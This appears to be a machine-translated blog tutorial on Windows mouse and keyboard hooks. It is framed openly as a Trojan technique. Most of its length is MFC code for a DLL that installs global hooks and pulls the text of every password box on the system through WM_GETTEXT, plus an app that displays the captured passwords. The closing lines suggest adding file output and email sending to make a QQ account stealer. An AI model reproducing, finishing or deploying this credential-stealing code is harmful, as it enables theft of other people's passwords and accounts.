Hook mouse Keyboard Message instance analysis

1, Trojan Horse control and communication methods include: Dual pipeline, port reuse, rebound technology, hook technology, today focus on the use of the introduction hook, hook information can be sent to hacker mailbox, etc., to achieve the purpose of the attack.

Transferred from: http://hi.baidu.com/mousetopshow/item/a951102d679f6e8f9c63d1b0

Hooks can intercept the system and have haircuts sent to other applications, which can accomplish functions that the general program cannot. It is necessary to master the hooks ' programming methods.

Hook Category:
1, Wh_callwndproc and Wh_callwndprocret: Enables you to monitor messages sent to a window procedure
3, Wh_debug Debugging Hooks
4, Wh_foregroundidle when the foreground thread of an application is about to become idle, the system calls Wh_foregroundidl
5. Wh_journalrecord monitor and record input events
6, Wh_journalplayback playback with Wh_journalrecord record events
7. Wh_keyboard Keyboard Hooks
9, Wh_keyboard_ll Low-level keyboard hooks
10. Wh_mouse Mouse Hook
11. Wh_mouse_ll Bottom Mouse Hook
12, Wh_shell Shell Hook

13, Wh_msgfilter and Wh_sysmsgfilter enable us to monitor menus, scroll bars, message boxes, etc.

Mounting hooks:
Call the function SetWindowsHookEx install the hook. Its function prototypes are:

the Idhook represents the hook type, which corresponds to the hook function type one by one. such as, Wh_keyboard, Wh_mouse.
LPFN is the address of the hook function.
Hmod is the handle to the instance where the hook function resides.

For thread hooks, this parameter is NULL, and for system hooks, this parameter is the DLL handle where the hook function resides. (The system hooks must be in the DLL)
dwThreadID Specifies the thread number of the thread that the hook is monitoring. For global hooks, this parameter is null.
Returns: the handle of the installed hook.

Uninstalling Hooks

Call function BOOL UnhookWindowsHookEx (hhook hhk) unload hook

Defining hook functions
The hook function is a special callback function. After the specific event that the hook is monitored, the system calls the hook function for processing. Generally the following:
LRESULT WINAPI myhookproc (int nCode, WPARAM wparam,lparam LPARAM)
Parameters wparam and lparam contain information about the hooked message, such as the mouse position, status, keyboard keys, and so on. Ncode contains a letter about the message itself, such as whether to move out of the message queue.

Instance:
Below we install mouse hooks. And the keyboard hook also intercepts the input password, and can see the * password as an example, to explain how to use the hook.

1. Enter the wizard, the new MFC AppWizard (DLL) named Getpass, select the MFC Extension DLL, complete.
2. Create a new Cgetpasshook class, base class: CObject, and add Starthook,stophook, function as follows:

3: Join the global shared data as follows:

#pragma data_seg ("Sharedata") Hhook Hkeyboardhook=null; Keyboard hook Hhook hmousehook=null; Mouse Hook hinstance glhinstance=null; globle instance HWND houtputwnd=null; Display Pass Wnd #pragma data_seg ()

4: Add mouse, keyboard hook handler function, as follows:

LRESULT WINAPI mousehookproc (int ncode,wparam WPARAM, LPARAM LPARAM) {//mouse hook function lpmousehookstruct lpmouse= ( MouseHookStruct far*) LParam; if (ncode>=0) {HWND htargethwnd=lpmouse->hwnd;//Gets the mouse window handle if (Htargethwnd) {LONG Style=::getwindowlong ( Htargethwnd,gwl_style); Get its style if (Style&es_password)//If it is a password box {char szpass[255];:: SendMessage (Htargethwnd, Wm_gettext, 255, (LPARAM) Szpass); <span style= "White-space:pre" ></span>//get Password:: SendMessage (Houtputwnd, Wm_settext, 0, (LPARAM) szpass); Show password}}}return CallNextHookEx (Hmousehook,ncode,wparam,lparam); Add this sentence, you can continue to pass the message, if not, it will cancel the delivery of this message,//can play the purpose of the intercept message, we call it here. }lresult WINAPI keyboardproc (int ncode,wparam wparam,lparam LPARAM) {//keyboard hook procif (ncode>=0) {HWND htargethw Nd=getactivewindow (); Get active window if (htargethwnd) enumchildwindows (htargethwnd,enumwndproc,0); Enumerate all Windows}//Plus this sentence, you can continue to pass the message, if not, it will cancel the delivery of this message,//can play the purpose of the intercept message, we call it here. return CallNextHookEx (Hkeyboardhook,ncode,wparam,lparam); }

here to introduce the following Enumchildwindows function, the prototype is as follows:
BOOL enumchildwindows (HWND hwndparent,windenumproc lpenumfunc,lparam LPARAM);
hwndparent: A handle to the enumeration window
Lpenumfunc: The address of the enumeration function,
LParam: here is 0

5: The function that joins the enumeration window. As follows: (note that because the previous function is going to use this function, it is either declared earlier or defined before the function above.)

BOOL WINAPI Enumwndproc (hwnd hwnd,lparam LPARAM) {//enum the child Window,find Passedit if (hwnd) {LONG Style=::getwindow Long (Hwnd,gwl_style); Get the style if (Style&es_password)//Is the password box {char szpass[255];:: SendMessage (hwnd,wm_gettext,255, (LPARAM) szpass);// Get Pass:: SendMessage (houtputwnd,wm_settext,0, (LPARAM) szpass);  Show return TRUE; }}return TRUE; }

6: Define segment properties in DEF file: (This step is important)
SECTIONS
mydata READ WRITE SHARED

7: Complete the Starthook,stophook function, start/close the hook as follows:

BOOL Cgetpasshook::starthook (HWND hwnd) {//install Hoookhmousehook=setwindowshookex (Wh_mouse,mousehookproc, glhinstance,0);//mouse Hookhkeyboardhook=setwindowshookex (wh_keyboard,keyboardproc,glhinstance,0);//keyboard Hookif (Hmousehook&&hkeyboardhook) {Houtputwnd=hwnd;//display password handle return TRUE;} return FALSE;} BOOL Cgetpasshook::stophook () {//unstall hookbool Mhook=unhookwindowshookex (Hmousehook); BOOL Khook=unhookwindowshookex (Hkeyboardhook); if (Mhook && khook) {return TRUE;} return FALSE;}

8: In the DllMain function to get the DLL handle, to use the glhinstance variable, so add a sentence, as follows:

extern hinstance glhinstance; Remember here extern "C" int apientry DllMain (hinstance hinstance, DWORD dwreason, LPVoid lpreserved) {unreferenced_parameter (LP Reserved); if (Dwreason = = Dll_process_attach) {TRACE0 ("Getpass. DLL initializing!\n "); if (! AfxInitExtensionModule (Getpassdll, hinstance)) return 0; New CDynLinkLibrary (Getpassdll); Glhinstance=hinstance; Get handle} else if (Dwreason = = Dll_process_detach) {TRACE0 ("Getpass. DLL terminating!\n "); AfxTermExtensionModule (Getpassdll); } return 1; OK}

9: Compile, complete the DLL section,

Create the app section below. As follows:

1: New MFC AppWizard (EXE) named GetPassword, and in the first step, choose Add to the current workspace join to present workspace, so convenient.

2: Put the GetPass.lib in the DLL, and GetPassHook.h copy the app in the directory, and then project->add to Project-->files
Select these two files.

2: In the main dialog box, add a edit,id to Idc_edit_pass

3: Declare an object in CGetPassWordDlg.h that contains the GetPassHook.h file. As follows:

#include "GetPassHook.h" class Cgetpassworddlg:public CDialog {Protected:cgetpasshook m_hook; .... Declare_message_map ()};

4: In the implementation file: OnInitDialog () Start Hook

BOOL Cgetpassworddlg::oninitdialog () {   //install hookcwnd *pwnd=getdlgitem (idc_edit_pass); M_hook. Starthook (Pwnd->getsafehwnd ()); return true unless you set the focus to a control return true;}

5: Join the WM_DESTROY message and stop the hook when exiting the program as follows:

void Cgetpassworddlg::ondestroy () {Cdialog::ondestroy ();//stop Hook M_hook. Stophook (); }

6: Copy the GetPass.dll to. EXE under a directory,

7: Compile, run.
this way, when you enter a password in any password box, the password is intercepted. Even if the keyboard hook fails, move the mouse to the password box, also get the * number password, because we installed two hooks. Start QQ, enter the password, try to see if you have intercepted the password? Will this program a little to modify, will intercept the password output to the file, and join send mail to attack, a QQ thief number is made of

Copyright NOTICE: This article for Bo Master original article, without Bo Master permission not reproduced.

Hook mouse Keyboard Message instance analysis